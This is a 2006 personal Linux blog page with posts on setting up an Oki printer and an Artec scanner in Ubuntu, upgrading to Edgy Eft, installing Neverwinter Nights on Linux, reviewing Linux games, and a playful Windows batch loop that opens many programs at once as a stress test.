Works like a charm, and quite fast too after tinkering with some effects and themes.

Wednesday, October 25, 2006

Oki Printers In Ubuntu

Just wanted to share this quick story: recently I had to install Oki C5700 drivers on an Ubuntu machine. A quick look at the web panel revealed that it was not supporting ipp (Cups). So you have to set it up as a Unix Printer (LPR).

After that it seems to work fine. (It is a great laser printer by the way.)

Edgy Tomorrow!

Ah the suspense: Edgy Eft is coming out tomorrow (if all goes well).

Here are the update instructions once more:

  • (Backup.)
  • gksu "update-manager -c -d" for the masses: quick and easy.
  • Or replace dapper with edgy in /etc/apt/sources.list and do a sudo apt-get update && sudo apt-get dist-upgrade.
  • Make sure everything is ok:
    sudo apt-get -f install
    sudo dpkg --configure -a

Of course, this is all over Digg and others. But I just couldn't help sharing this. It'll be a tense day tomorrow...

Saturday, September 30, 2006

Looking Forward (To October)

I'm really looking forward to the end of October. Since I will then be able to update my Dapper laptop to Edgy Eft which will have AIGLX built in. Then I can install Beryl (a compiz-quinnstorm fork). I will not install beta software however, since I use that laptop for work etc... So the 'how I did it'-guide will have to wait.

If you can't wait however, this LiveCD could help. (Boot with "sabayon aiglx".)
(From the announcement.) Beryl is a fork of compiz, and a collection of other tools to go along with it. CSM has become Beryl Settings Manager (beryl-settings). CGWD has become Emerald, with its companion emerald-theme-manager.

Monday, September 18, 2006

Crappy Scanners And Linux

Recently we got a new HP Scanner. It's a good, nice one without any complaints.

However: the scanner I used before was a crappy scanner with a brand nobody knows, picked up for almost nothing at some cheapskate-store (because I very rarely need to scan something). The installation of the drivers was always a pain, copying files around, right clicking .inf files and whatnot... And then hoping that it wouldn't throw a general 'TWAIN error' at me. People who know something about this whole TWAIN thing know it's a pain. According to Wikipedia, it stands for Technology (or Toolkit or Thing) Without An (or Any) Intelligent (or Important or Interesting) Name, which is just cheesy. Hell, I even think that Microsoft's new WIA (or: Windows Imaging Acquisition) is better.

Anyway: a few weeks ago, my Windows machine gave up scanning, maybe it had something to do with the fact that I was running Windows x64, I don't know. Reinstalling drivers: no dice. Moving files around: no dice. Installing drivers for other scanners (one can try): no dice. Unplugging the damn thing and throwing it out of the window... err... no dice.

Until now. I was thinking: "Hey look, there's that stupid old scanner, maybe this will work on Linux..." So I promised myself that I would spend a few minutes (not more) trying to get this to work, before dumping it completely.

I connect the scanner to a free USB port... nothing happens. No worries, after fiddling around I find that the command is xsane (hey, go easy on me, I'm still a bit of a Linux noob).

So I try that, and get a nice bunch of error messages... perfect.

failed to open device 'artec_eplus48u:libusb:001:002': invalid argument

Really? So my crappy brand scanner is actually an Artec. Fine, after searching a bit on Google I find the following suggestions, export this:
export SANE_DEBUG_ARTEC_EPLUS48U=9

And then run again, we now get some more information:

[artec_eplus48u] Try to open firmware file: "/usr/share/sane/artec_eplus48u/Artec48.usb"
[artec_eplus48u] Cannot open firmware file "/usr/share/sane/artec_eplus48u/1200.usb"
[artec_eplus48u] download_firmware_file failed

Apparently, .usb is a Windows driver, so good luck getting it. Luckily, the drivers were still on my other machine, and I did a search for every .usb I could find. Artec48.usb got found and copied over to the directory xsane suggests: /usr/share/sane/artec_eplus48u (had to create it).

I tried again... It frickin' works! What a piece of cake.

If you happen to have the same problem, and want the Artec48.usb driver, you may of course drop me a note (macuyiko at gmail dot com).
I'm happy, now this scanner still is a little bit of use. This is what I like about Linux: if you have a problem: continue fiddling and trying without giving up. In the end it'll work out and you'll have learned a lot of things (which is great).

Monday, September 11, 2006

Neverwinter Nights On My Ubuntu-Laptop

Today I finally decided to spend some time and try to install Neverwinter Nights on my laptop, since I absolutely still love that game. Of course: you could follow this howto, but since I don't have NWN Platinum or Diamond, I had to follow other instructions. I didn't want to pirate the game (I legally own the original and the two expansions, so I figured that would work too).

Instead I followed the instructions from Bioware, congrats to them for making this game available on a Linux (and Mac) platform!

Step 1: "Installing Using Downloaded Linux Client Resources"

Download the Linux Client Resources v1.29 (from BioWare). Extract this archive somewhere (e.g.: /home/user/Programs/nwn).

We will do the English install, for other languages: follow the Bioware instructions, these instructions are just narrowed down and compressed...

Also download the Linux Client 1.29 binaries (tar.gz, 5.3 MB). (Make sure you are logged in to the Bioware site, registering is free.) And also extract these into your installation folder. Make sure you overwrite all existing files - this is a rule for all further archives, unless stated otherwise.

If you have SoU and HoU, don't update to the latest version yet. And wait with playing the game ;).

Step 2: "Installing Shadows of Undrentide Expansion Pack"

Make sure step 1 completed successfully. Since the Linux installer on the disk is broken, we will do it ourselves.

Make sure you can access the following files, they are in the CDs root folder.
Data_Shared.zip
Language_data.zip
Language_update.zip
Data_Linux.zip

Extract them into your installation folder in the above order (overwrite)!

Then delete the following files from your installation folder if they exist:

/INSTALL/data/patch.bif
/INSTALL/patch.key

And then execute the following command from a terminal:

./fixinstall

Step 3: "Installing Hordes of the Underdark Expansion Pack"

Make sure you completed steps 1 and 2.

Remove the following files if they exist:
/INSTALL/patch.key
/INSTALL/data/patch.bif
/INSTALL/xp1patch.key
/INSTALL/data/xp1patch.bif

Again: get the following archives from the HoU CD root and unzip them into your installation folder in the following order:
Data_Shared.zip
Language_data.zip
Language_update.zip

Download nwclienthotu.tar.gz and also extract it into your nwn directory, overwriting all.

Again, run ./fixinstall from your installation directory.

Step 4: updating

Now update the game, download the patch here. To update, just overwrite-extract the archive you have downloaded in the installation folder.

Step 5: fixing

I got the following error when starting Neverwinter with the ./nwn command:
mcop warning: user defined signal handler found for SIG_PIPE, overriding
Creating link /home/username/.kde/socket-hostname.
can't create mcop directory

To fix this, I executed:
mkdir ~/.kde/socket-hostname
Replace hostname with your own hostname, of course (it is mentioned in the error).

Then everything worked perfectly fine: NWN starts and I can enter my CD keys, the game doesn't run like it does on my gaming machine, but I'm satisfied that it runs at all with such a small Thinkpad X60 with quite a crappy graphics chip.

Again: thanks to Bioware for making this available (which other game company would host a one-gigabyte file on their servers?).

Happy adventuring!

Monday, September 04, 2006

Grinding Windows (To A Halt?)

Some of you have probably read this post on Digg. Someone apparently made a video about Edgy Eft running 40 processes without crashing.

Some people basically replied "Windows [and Linux] can do this for ages!" or like "This is really neat!".

It is really cool though that the Ubuntu team has managed to quickly open Openoffice (around 3 seconds now), I am really looking forward to see that running on my laptop.

However, I wanted to prove that Windows will also not crash when doing this (not a recent version that is). So here it is: my video response, using the following amazing batch script:
:loopit
start sol
start mspaint
start calc
start notepad
goto loopit
It's the loop of doom! Sorry for the bad quality, but it's better than YouTube. When I closed the command line window, Windows was running around 140 instances of Notepad, Paint, Solitaire and Calculator each (screenshots maybe later). However: during all this, it did slow down, but it was still quite manageable afterwards. I had to stop the loop because Paint was starting to spit out error messages (as you can see in the video).

Then, I closed the four groups from the taskbar. Windows seems to have a bug here: it doesn't close all programs and some had to be closed manually (ah the fun!).

On which system was all this done: on my main Desktop/beast machine: two Opterons and 4GB of RAM, so I agree that this is in fact not really fair towards that first Linux-video, but it was a fun thing to do (I was surprised that Camtasia could survive the heavy load).

In conclusion: I do not want to flame Ubuntu or Linux in general (I am running it myself so...), but running 40 processes at once is not such a formidable feat. Also: Windows is more stable than Mac/Linux/Whatever-zealots tend to believe[1].

Ah, those lazy Sundays...

[1]: Except for Windows 3.1. And 95. And 98. 98SE too, a little. And ME. Especially ME. Stay away from ME... 2000 might work I think. Windows XP 32 bit too (I was running 64bit). And 2003 probably too.

Tuesday, August 29, 2006

Linux Games

I've been checking out some games for my Linux machine recently (that almost sounds like an oxymoron). I'm not going to go all whiny on you with a "Linux does have games!"-post, but will just review a few of them (the most popular ones).
  • Planet Penguin Racer (a fork of Tux Racer): I never wanted this game, when all those Linux-sites/posts/magazines said: "hey look we have a racing game with a penguin" it just looked too kiddish. However: it is quite entertaining, and making some maps is quite fun. This is a nice quickie-game for the people with direct 3d rendering enabled ;).
  • Neverball: a game where you tilt the play field to make a ball roll and pick up coins. It's fun and looks quite nice but I suck at it.
  • Freecraft: it's an RTS, with poor graphics (sorry), I didn't like it that much and wish there was a good RTS game for Linux. I don't have anything against sprites (I loved Age of Empires 1 and 2, Age of Wonders, Starcraft, Kohan, etc...), but this can look better.
  • Globulation 2: also an RTS. Also not bad but I don't like it that much.
  • Tuxkart: fun for a while but not fantastic.
  • Frozen Bubble: the game everyone knows, and still great fun too!
  • Pingus: a Lemmings clone. Well done game, will keep the oldskool puzzlers really entertained!
  • Rocks And Diamonds: an all-in-one Boulderdash clone. Which I absolutely love because I can even play the Supaplex levels.
  • Wesnoth: another instant-classic, hexgrid fantasy strategy game, well done graphics and great tactical fun both online and offline.
  • Crimson Fields: Battle Isle clone, not bad but the graphics aren't that great.
  • Advanced Strategic Command: also a Battle Isle clone: better (traditional) graphics and AI, but the interface/polishing could be better.
  • SCUMMVM: absolute favorite. Grab this program together with some fat old-Lucasarts-adventures torrents and relive all those classics... A fantastic game for those long train-trips. Ah... the memories of playing Broken Sword 2 and really diggin' the characters and story. They don't make such games anymore since Grim Fandango[1].
That's it. It's not F.E.A.R., no Civilization 4, no GTA and no Age of Empires 3, but it is enough to kill a few minutes. After all, my Linux computer is my work machine, so the less I play, the more work I get done...

[1]: Actually I'm lying: Dreamfall, Fahrenheit (a.k.a. Indigo Prophecy) and others are great recent adventure games.

Saturday, August 19, 2006

Combat, New Blogger And A Farewell...

A farewell to Windows that is. Which I removed now from my laptop (since I'm so pleased with Ubuntu).

Of course I still have Windows on my gaming-slash-desktop machine. Playing a bit of Flatout 2 lately. I tried to download the F.E.A.R. Combat installer (multiplayer component of F.E.A.R. which is now released for free). But after installing and trying to run it quit with a nice ugly error... so no Combat for me until I sort this out.

I've been reading about the new Blogger and their closed beta. Pity for me. Until today: I accidentally logged in with my Google account name and password and *poof*: it gave me an option to migrate. I picked a new template to try some things (I actually like this one now). The new templating system is quite cool: it is really easy to arrange items and pick fonts and colors.

I see that there is now an option to set labels too for a post (which is a fancy name for "tags") which means I don't have to use the Technorati ones anymore...

That was all folks... more later.